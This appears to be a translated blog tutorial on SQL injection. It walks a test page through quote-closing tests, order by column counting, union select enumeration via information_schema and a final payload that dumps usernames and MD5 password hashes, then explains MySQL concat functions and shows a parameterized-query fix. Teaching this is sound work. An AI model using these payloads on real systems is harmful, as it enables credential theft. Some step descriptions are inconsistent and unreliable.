Zhangxiaobai's road of penetration (VI) -- the idea and process of SQL injection, the concat series functions, and the information_schema database explained
2022-06-25 12:33:00 【Litbai_zhang】
Preface
The theory behind SQL injection was covered in Xiaobai's earlier post; if you are interested, go and have a look: SQL Detailed explanation of injection principle.
Practice

In the URL of the SQL injection test interface, enter:
?id=1
If the page is returned unchanged, this indicates that there may be an injection point.
Let's continue with this example to further understand the thinking behind SQL injection.
For example, suppose what I want now is a user's password from the database. What should we do?
1. View the page source and analyse it
There is nothing more to say about this step: the purpose of the analysis is to check whether an injection vulnerability exists.
2. Inject code in a testable way (note: the ? must not be typed as a full-width Chinese character)
?id=1' and 1=1--+

?id=1' and 1=2--+

Looking at the two screenshots above: first we append a ' to the input, which closes the quoted value in the original query. Then we add a condition, and 1=1 or and 1=2. If the former page loads normally while the latter does not (because and 1=2 is always false, the query returns nothing and the correct page cannot be shown), then we can be sure there is an injection vulnerability.
3. Having verified that the vulnerability does exist, and because the injection is in a numeric-style parameter (id=x), we use an order by clause (which sorts a column from small to large; for letters that is abcd...) to test how many columns the query returns.
4. Let's guess that there are 4 columns (this guess is completely random): ?id=1' order by 4--+
An error is returned: no field found in the clause for column 4 (MySQL's "Unknown column '4' in 'order clause'").
5. So we try again with order by 3: ?id=1' order by 3--+
The page loads normally, so we can be sure that the query behind the ID parameter returns 3 columns.
6. Now that we know there are 3 columns, we try to obtain some sensitive information through a union query.
?id=1' and 1=2 union select 1,user(),database()--+
With this request we can reveal the current MySQL user name on the server and the current database name; the database name can then be used to obtain the table names. (The column names of a UNION result set are always taken from the first SELECT, so we use and 1=2 to make the original query return no rows and leave only our injected row.)
7. Now that we know the database name, the next step is to get the table names in that database.
We try entering the code
?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

Two table names are found.
8. Next we use the information_schema database to query the column names.
Inject the code
?id=1' and 1=2 union select 1,group_concat(name),group_concat(pass) from users--+
Finally we get the data we need; the second line of output is the password we want, stored as an MD5 hash.
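As an added example (not from the original post), here is the string-building pattern behind the test interface in steps 2 and 8 next to its parameterized fix, run against a constructed users table in SQLite; the table, names and hash values are placeholders I made up for the demonstration.

```python
import sqlite3

# Constructed sample data: users(id, name, pass); the "pass" values are
# placeholder MD5-style strings, not real credentials.
SAMPLE_USERS = [
    (1, "litbai", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "admin", "21232f297a57a5a743894a0e4a801fc3"),
]

# The post's step-8 payload with --+ URL-decoded to "-- " (constructed input).
PAYLOAD = "1' and 1=2 union select 1,group_concat(name),group_concat(pass) from users -- "


def make_db():
    """Build an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, id_param):
    """The flaw in the post's test interface: the ?id= value is spliced into
    the SQL text, so a trailing ' closes the quote and the rest is parsed as SQL."""
    sql = "SELECT id, name, pass FROM users WHERE id='%s'" % id_param
    return conn.execute(sql).fetchall()


def lookup_safe(conn, id_param):
    """The fix: bind the value as a parameter so it is compared, never parsed."""
    sql = "SELECT id, name, pass FROM users WHERE id=?"
    return conn.execute(sql, (id_param,)).fetchall()


def demo():
    conn = make_db()
    return {
        # step 2: a true condition keeps the row, a false one drops it
        "and_1_eq_1": lookup_vulnerable(conn, "1' and 1=1 -- "),
        "and_1_eq_2": lookup_vulnerable(conn, "1' and 1=2 -- "),
        # step 8: the union row carries every name and hash out of the table
        "leaked": lookup_vulnerable(conn, PAYLOAD),
        # same payload against the parameterized query: it is just a non-matching id
        "safe": lookup_safe(conn, PAYLOAD),
    }
```
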
Functions worth mentioning:
CONCAT() function
The concat() function joins several strings into one string.
Below is a table named info:
| id | name |
|---|---|
| 1 | litbai |
a. Syntax and usage characteristics
concat(str1,str2,...)
The return value is the string produced by joining the arguments. If any argument is NULL, the return value is NULL. There may be one or more arguments.
b. Examples of use
select concat(id,',',name) as zhang from info limit 1;
The result is (note the comma in the output: it is also part of the concatenated string)
| zhang |
|---|
| 1,litbai |
select concat(id,null,name) from info limit 1; returns
| concat(id,null,name) |
|---|
| NULL |
CONCAT_WS() function
When we want to specify a separator between the arguments, we can use the concat_ws() function.
a. Syntax and usage characteristics
concat_ws(separator,str1,str2,...)
concat_ws means concat with separator, that is, concat with a separator.
The separator can be a string or another expression. If the separator is NULL, the result is NULL. NULL values among the remaining arguments are skipped, but empty strings are not skipped (so, unlike concat, concat_ws drops every NULL among the values rather than returning NULL).
b. Examples of use
select concat_ws('~',id,name) as zhang from info limit 1;
Result
| zhang |
|---|
| 1~litbai |
select concat_ws('~','job',null,'age');
Result
| concat_ws('~','job',null,'age') |
|---|
| job~age |
GROUP_CONCAT() function
The group_concat function returns a string result made of the values in each group joined together.
For example, suppose the data in the info table is as follows:
select name,id,job from info where name in ('lit','bai');
| name | id | job |
|---|---|---|
| lit | 1 | teacher |
| lit | 2 | worker |
| bai | 34 | code monkey |
| bai | 46 | cleaner |
a. Syntax and characteristics
group_concat([distinct] expr [,expr ...]
[order by {unsigned_integer | col_name | formula} [asc | desc] [,col ...]]
[separator str_val])
In MySQL, this returns the joined values of the expression for each group.
Using distinct excludes duplicate values. To sort the values in the result, use the order by clause.
separator is a string value inserted between the result values; the default is a comma, and separator '' removes the separator entirely.
b. Examples of use
select name,group_concat(id) from info where name in ('lit','bai') group by name;
| name | group_concat(id) |
|---|---|
| bai | 34,46 |
| lit | 1,2 |
select name,group_concat(distinct id order by id desc separator '~') from info where name in ('lit','bai') group by name;
| name | group_concat(distinct id order by id desc separator '~') |
|---|---|
| bai | 46~34 |
| lit | 2~1 |
select name,group_concat(concat_ws(',',id,job) order by id desc separator '.') from info where name in ('lit','bai') group by name;
| name | group_concat(concat_ws(',',id,job) order by id desc separator '.') |
|---|---|
| bai | 46,cleaner.34,code monkey |
| lit | 2,worker.1,teacher |
group by and order by
group by: groups rows by the listed column(s)
order by: sorts from small to large (ascending)
order by ... desc: sorts from large to small (descending)
Database worth mentioning
information_schema can be understood as the catalogue of all databases on the server.
For example, if I want to
Query all databases:
select schema_name from information_schema.schemata;
Query all table names in the litbai database:
select group_concat(table_name) from information_schema.tables where table_schema='litbai';